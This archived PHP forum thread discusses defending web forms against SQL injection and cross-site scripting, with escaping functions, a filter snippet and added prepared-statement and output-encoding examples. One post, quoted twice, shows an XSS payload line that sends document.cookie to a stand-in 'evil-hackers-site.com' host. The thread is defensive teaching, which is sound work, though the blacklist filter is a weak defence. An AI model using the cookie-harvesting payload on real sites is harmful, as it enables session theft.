Archived

This topic is now archived and is closed to further replies.

Mutley

Security PHP & Forms

Are there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections; how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.

mysql_real_escape_string would prevent SQL injection. Another thing you need to be wary about is XSS (cross-site scripting) attacks.

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it on my variables within form fields. Looks easy and useful; I guess it stops certain characters or character combinations from being used.

Not heard of XSS, is it common?

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it on my variables within form fields. Looks easy and useful; I guess it stops certain characters or character combinations from being used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because otherwise the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use stripslashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

function sql_quote($value)
{
    // If magic_quotes_gpc already added backslashes to the request data,
    // remove them first so the value is not escaped twice.
    if (get_magic_quotes_gpc())
        $value = stripslashes($value);

    // Prefer the MySQL-aware escaping (it knows the connection charset);
    // fall back to addslashes() only if the mysql extension is not loaded.
    if (function_exists("mysql_real_escape_string"))
        $value = mysql_real_escape_string($value);
    else
        $value = addslashes($value);

    return $value;
}

?>[/code]

Orio.
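As an added illustration that is not part of the thread (neither Orio's code nor anything from the PHP manual), here is the same form value handled with a prepared statement, beside the string-built query that sql_quote() is meant to protect. The table name `users`, the column `username`, the DSN and the credentials are placeholders. Note that mysql_real_escape_string() belongs to the old ext/mysql extension, which was removed in PHP 7.0, so on current PHP the parameterised form is the only one of the three that still runs.

```php
<?php
// Added example: a login-form lookup done three ways.
// Assumes a table users(id, username) and a MySQL server; DSN and credentials are placeholders.

declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

$username = $_POST['username'] ?? '';

// 1) Vulnerable: the form value is spliced into the SQL text, so a quote
//    character in the input changes the structure of the query.
// $sql = "SELECT id FROM users WHERE username = '$username'";

// 2) Escaping (the thread's sql_quote() approach): still string-building;
//    correct only if every value is escaped AND quoted, and the escaping
//    function knows the connection charset.
// $sql = "SELECT id FROM users WHERE username = '" . sql_quote($username) . "'";

// 3) Prepared statement: the SQL text and the value travel separately, so the
//    value is never parsed as SQL, whatever characters it contains.
function findUserId(PDO $pdo, string $username): ?int
{
    $stmt = $pdo->prepare('SELECT id FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $id = $stmt->fetchColumn();
    return $id === false ? null : (int) $id;
}

$id = findUserId($pdo, $username);
echo $id === null ? "no such user\n" : "user id $id\n";
```

With emulated prepares switched off, PDO sends the statement to MySQL first and the bound value afterwards, which is why no escaping step is needed at all; the same pattern is available through mysqli::prepare() if PDO is not in use.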

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. The user gets redirected to the hacker's page. It could be like this (JavaScript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting

Is that also prevented with the command spoken about above?
If the website does not use cookies, then it is impossible to gather information from the user that goes to the site, right?

Isn't stripslashes enough?
Sorry if I got it wrong.

[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this:
[code]// Normalise any entity-encoded input first, then neutralise the characters
// and URL schemes that would let markup or script through.
$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
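The snippet above tries to recognise and defuse dangerous input. The example below, added here and not part of Daniel0's post or the linked wiki, takes the other approach that the XSS-prevention literature recommends: leave the stored value alone and encode it for the HTML context at output time, so that whatever the cookie-harvesting redirect in the earlier post relies on can never be formed from user data. It also sets the session cookie HttpOnly, which keeps it out of reach of `document.cookie`. The helper name `h()`, the form field `comment` and the sample text are assumptions.

```php
<?php
// Added example: escape on output for the HTML context instead of filtering input.

declare(strict_types=1);

// Keep the session cookie out of document.cookie; must be set before session_start().
ini_set('session.cookie_httponly', '1');
session_start();

/**
 * Encode a string for safe insertion into HTML text or a double-quoted attribute.
 * Converts <, >, &, " and ' so the browser shows them as text, never as markup.
 */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input, as a form might submit it.
$comment = $_POST['comment'] ?? '<b>hello</b> & "bye"';

// Vulnerable: the raw value is reflected into the page and parsed as HTML.
// echo "<p>$comment</p>";

// Safe: the value is displayed literally; no tag, attribute or script can be formed.
echo '<p>' . h($comment) . '</p>';

// Attribute context: quote the attribute and encode the value the same way.
echo '<input type="text" name="comment" value="' . h($comment) . '">';
```

Encoding at output rather than at input means the database keeps the original text, the same value can later be emitted in another context with the matching encoder (JSON for a script block, rawurlencode() for a URL parameter), and there is no list of forbidden strings to keep up to date.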

[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. The user gets redirected to the hacker's page. It could be like this (JavaScript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice Daniel0..

Here is an article from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]SQL insertion[/url].

Good luck,
Tom
